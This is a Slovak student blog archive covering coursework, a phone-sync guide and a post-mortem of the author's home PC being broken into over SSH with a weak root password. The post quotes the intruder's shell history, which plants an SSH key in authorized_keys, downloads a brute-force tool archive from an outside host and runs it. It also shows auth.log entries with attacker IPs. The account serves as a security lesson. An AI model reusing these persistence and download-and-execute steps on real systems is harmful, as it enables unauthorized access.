Zadanie
Text zadania je uvedený v dokumentácií.
Archív s vypracovaným zadaním
Dokumentácia
pondelok 14. decembra 2009
PS1 analyzátor
Zadanie
Navrhnite a implementujte programový “post” analyzátor Ethernet siete, ktorý analyzuje komunikáciu v sieti zaznamenanú do súboru a poskytuje nasledujúce informácie o komunikácii získané analýzou rámcov.
1)Výpis celej komunikácie t.j. všetkých rámcov v hexadecimálnom tvare, postupne tak ako boli zaznamenané v súbore, s uvedením poradového čísla rámca v analyzovanom súbore a dĺžky rámca v bajtoch.
Študent musí vedieť vysvetliť vnáranie protokolov.
2)Počet zaznamenaných Ethernet II rámcov.
3)Počet zaznamenaných IEEE 802.3 rámcov typu
802.3/802.2, 802.3/SNAP, 802.3 raw
Pre každý z nájdených typov treba vypísať v hexadecimálnom tvare minimálne prvých 24 bajtov jedného ľubovoľného rámca s uvedením jeho poradového čísla v analyzovanom súbore.
4)Výpis všetkých rámcov jednej TCP komunikácie medzi ľubovoľnou dvojicou entít určených dvojicami - IP adresa, port.
Výpis je postupnosť rámcov v hexadecimálnom tvare, postupne tak ako sú zaznamenané v súbore, s uvedením poradového čísla rámca v súbore.
Študent musí vedieť vysvetliť, čo konkrétne určuje daný port (akú aplikáciu) a pre vypísané rámce, v akom stave sa protokol TCP nachádza (otváranie spojenia, spojenie zriadené, uzatváranie spojenia).
pondelok 25. mája 2009
Projekt z predmetu DBS
Zadanie bolo vlastné, vybral som si to isté čo na PSI, teda systém pre oddelenie zákazníckej podpory, ale v podstate je to bugzilla :) . Výsledný produkt je webaplikácia písaná v Jave 1.6, s pomocou frameworkov ako Cayenne, Stripes, JSTL, atd. Dokonca je aj pekne oštýlovaná Archiv obsahuje netbeans projekt s aplikaciou, bez libiek + dokumentacia (tu si nevsimat :) ).
Archiv
Archiv
štvrtok 5. februára 2009
streda 28. januára 2009
Skúška z predmetu PIS riadny termín 28.1.2008
Testová časť
test z AIS
Písomná čast
1.Nakresliť business process model, pre rezerváciu chaty cez internet. od výberu chaty po rezerváciu, a napísať ktoré sú Business items, a ktoré Resources.
2.Nakresliť diagram dátového modelu pre vyššie uvedený proces.
test z AIS
Písomná čast
1.Nakresliť business process model, pre rezerváciu chaty cez internet. od výberu chaty po rezerváciu, a napísať ktoré sú Business items, a ktoré Resources.
2.Nakresliť diagram dátového modelu pre vyššie uvedený proces.
piatok 16. januára 2009
pondelok 5. januára 2009
Synchronizácia s Sony Erricson k550i
Po dlhotrvajúcej márnej snahe synchronizovať PC s telefónom som to dnes opäť skúsil. Používam ArchLinux a pri snahe použiť opensync, skončilo na tom že evolution plugin z svn sa neskompiloval s svn opensync, a tým pádom mi to bolo celé zbytočné. Aby to fungpvalo potrebujete opensync evolution a syncml plugin, pomocou projektu BlueProximity nastaviť aby sa telefón synchronizoval cez Bluetooth vždy ked príde k dosahu PC. Preto som našiel riešenie ktoré zahrnuje prenos dát z internetu na telefón a teda pár centov stojí, ale lepšie ako nič.Ako prvé potrebujeme programy Evolution a Genesis Sync (SyncEvolution).
Evolution je výborný groupware client, podporuje email,kalendáre,úlohy,poznámky, a je v podstatne lepšom stave ako Kontact KDE4 balík, hlavne čo sa týka uplnosti a množstve chýb, aj ked mu chýba napr. RSS čítačka, a time tracker.
Genesis Sync je front-end pre SyncEvolution (malý program pre synchronizáciu Evolution so SyncML serverom).
Beží v systray a pri prvom spustení ponúkne servera s ktorým sa má Evolution synchronizovať. Najprv ale potrebujeme SyncML server kde budeme mať údaje uložené.Použil http://www.scheduleworld.com/ ktorý mám spojený s Google Calendarom. Po vytvorení konta pridú na zadaný email nastavenia pre telefón. Tie je potrebné nastavit v telefóne v menu Organizátor ->Synchronizácia, nastaviť čo všetko chceme synchronizovať (kalendár, úlohy, poznámky), a nastaviť na rovnaký server aj Genesis, tu stačí vybrať zo zoznamu http://www.scheduleworld.com/, nastaviť názov spojenia (ľubovoľný), a ďalej prihlasovacie meno a heslo na server, a kliknutím na ikonku Genesis v tray spustiť synchronizáciu.
Všetky zmeny urobené v Evolution, Genesis v určenom intervale synchronizuje so serverom, na telefón sa zmeny rovnako aplikujú po synchronizácii so serverom. Našťastie vačšinou ide len o niekoľko kB dát, čo oceňujem kedže na Slovensku paušál s meobmedzenými dátami pre telefón neexistuje. Na zobrazenie kalendára, a úloh odporúčam výbornú aplikáciu MobyToday. Keďže vidíte v pohotovostnom stave údaje z kalendára, rovnako ako je to na mobiloch so Symbianom alebo Windows Mobile. Výbornou možnosťou je odsadenie celého zoznamu od hornej hrany displeja, aby sa neprekrývali údaje s logom operátora ( "offset from top of screen" na asi 40 bodov).
Evolution je výborný groupware client, podporuje email,kalendáre,úlohy,poznámky, a je v podstatne lepšom stave ako Kontact KDE4 balík, hlavne čo sa týka uplnosti a množstve chýb, aj ked mu chýba napr. RSS čítačka, a time tracker.
Evolution
Genesis Sync je front-end pre SyncEvolution (malý program pre synchronizáciu Evolution so SyncML serverom).Genesis Sync
Beží v systray a pri prvom spustení ponúkne servera s ktorým sa má Evolution synchronizovať. Najprv ale potrebujeme SyncML server kde budeme mať údaje uložené.Použil http://www.scheduleworld.com/ ktorý mám spojený s Google Calendarom. Po vytvorení konta pridú na zadaný email nastavenia pre telefón. Tie je potrebné nastavit v telefóne v menu Organizátor ->Synchronizácia, nastaviť čo všetko chceme synchronizovať (kalendár, úlohy, poznámky), a nastaviť na rovnaký server aj Genesis, tu stačí vybrať zo zoznamu http://www.scheduleworld.com/, nastaviť názov spojenia (ľubovoľný), a ďalej prihlasovacie meno a heslo na server, a kliknutím na ikonku Genesis v tray spustiť synchronizáciu.Všetky zmeny urobené v Evolution, Genesis v určenom intervale synchronizuje so serverom, na telefón sa zmeny rovnako aplikujú po synchronizácii so serverom. Našťastie vačšinou ide len o niekoľko kB dát, čo oceňujem kedže na Slovensku paušál s meobmedzenými dátami pre telefón neexistuje. Na zobrazenie kalendára, a úloh odporúčam výbornú aplikáciu MobyToday. Keďže vidíte v pohotovostnom stave údaje z kalendára, rovnako ako je to na mobiloch so Symbianom alebo Windows Mobile. Výbornou možnosťou je odsadenie celého zoznamu od hornej hrany displeja, aby sa neprekrývali údaje s logom operátora ( "offset from top of screen" na asi 40 bodov).
štvrtok 1. januára 2009
ssh + verejna ip + slabe heslo = ?
Krátky príbeh o tom že na bezpečnosť je potrebné myslieť aj doma. Včera došlo miesto na disku na jednom mojom PC, prerušil sa update a následkom toho, v X prestala fungovať klávesnica a myš, takže nebolo možné ani prepnúť do konzoly. Keďže bol Silvester tak som radšej šiel oslavovať a riešil som to dnes.
Okolo 22:15 mi stúpol náhle ping na 5s, a sieť sa stala nepoužiteľnou. Podozrieval som lacný D-Link router, a to že niekto ťahá torrenty, takže som ho reštartoval a čakal čo sa udeje. bude diať. Zmena nenastala, takže som sa šiel pozrieť k súrodencom do izby, a pri PC nikto nebol, keďže som vedel že nikto doma už nie je na internete, prišlo mi to divné a pustil som si iptraf na opustenom PC (program na sledovanie sieťového traffic-u). Vyrojilo sa na mňa množstvo prichádzajúcich a odchádzajúcich spojení, všetky s cieľovým portom 22. Hneď som si spomenul že na tento PC, mám z router-a presmerované ssh a začalo mi dochádzať. Rýchlo som vytiahol telefónny kábel z router-a aby odpojil internet a aby som mohol presmerovanie zrušiť. Následne som ho zrušil, nastavil hosts.allow, a hosts.deny a mám istotu že cez ssh sa mi nikto okrem mňa neprihlási. Ďalší krok spočíval v zistení škôd.
príkaz :
Výsledok : 4 prihlásenia z Iránu a US.
To že som mal ssh presmerované na PC, mi podľa logov pridalo asi 5300 neúspešných prihlásení od polovice novembra a 4 úspešné. Ako na nový rok tak po celý rok.
slovník s heslami ktorý chlapík použil (moje heslo je približne 30-te od začiatku)
Okolo 22:15 mi stúpol náhle ping na 5s, a sieť sa stala nepoužiteľnou. Podozrieval som lacný D-Link router, a to že niekto ťahá torrenty, takže som ho reštartoval a čakal čo sa udeje. bude diať. Zmena nenastala, takže som sa šiel pozrieť k súrodencom do izby, a pri PC nikto nebol, keďže som vedel že nikto doma už nie je na internete, prišlo mi to divné a pustil som si iptraf na opustenom PC (program na sledovanie sieťového traffic-u). Vyrojilo sa na mňa množstvo prichádzajúcich a odchádzajúcich spojení, všetky s cieľovým portom 22. Hneď som si spomenul že na tento PC, mám z router-a presmerované ssh a začalo mi dochádzať. Rýchlo som vytiahol telefónny kábel z router-a aby odpojil internet a aby som mohol presmerovanie zrušiť. Následne som ho zrušil, nastavil hosts.allow, a hosts.deny a mám istotu že cez ssh sa mi nikto okrem mňa neprihlási. Ďalší krok spočíval v zistení škôd.
príkaz :
grep Accep auth.log* | grep -v 192.168vráti úspešné prihlásenia na ssh z inej ako vnútornej siete.
Výsledok : 4 prihlásenia z Iránu a US.
auth.log:Jan 1 18:23:49 myhost sshd[2670]: Accepted password for root from 217.219.201.24 port 51624 ssh2História :
auth.log:Jan 1 21:44:12 myhost sshd[3097]: Accepted password for root from 79.117.134.167 port 1104 ssh2
auth.log:Jan 1 22:00:17 myhost sshd[3139]: Accepted publickey for root from 79.117.134.167 port 1113 ssh2
auth.log.1:Dec 24 20:55:35 myhost sshd[9934]: Accepted password for root from 64.106.218.110 port 54198 ssh2
cat .proc/cpuinfoprihlásený bol asi 10-15 minút kým som neresetol PC. Pozrel si aký mam PC, stiahol si nástroje (v sťahovanom archíve mal sshd, screen, a skript pre slovníkový útok) a SP3 pre Windows 2000 :). Pridal si svoj kľuč aby sa mohol prihlasovať bez hesla, pustil si screen a preťažil mi router :). Riadky modrou farbou sú moje, kedy mi došlo čo sa asi deje a hľadal vinníka o chvíľu som odpojil sieť takže toho veľa nestihol.
cat /proc/cpuinfo
mkdir .,
/sbin/ifconfig | grep inet
wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe
cd /home
mkdir .ssh
cd .ssh
echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf+I2jI6xKq8lb
a96U6uUHtbiaRi814IyJ3Q0It54KBwQ== rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600 ~/.ssh/authorized_keys
cd ..
cd
cd /var/tmp
cd .,
ls -a
wget gabytzu.trei.ro/mc.tgz
tar zxvf mc.tgz
cd mc
chmod +x *
screen
exit
cd mc
chmod +x *
screen
exit
tail -f /var/log/auth.log
tail -f /var/log/auth.log*
cat /var/log/auth.log* | grep failure
cat /var/log/auth.log* | grep failure | wc -l
ls
dmesg
ping google.sk
iptraf
killall iptraf
top
tar zxvf mc.tgz
cd mc
chmod +x *
screen
exit
To že som mal ssh presmerované na PC, mi podľa logov pridalo asi 5300 neúspešných prihlásení od polovice novembra a 4 úspešné. Ako na nový rok tak po celý rok.
slovník s heslami ktorý chlapík použil (moje heslo je približne 30-te od začiatku)
Prihlásiť na odber:
Príspevky (Atom)
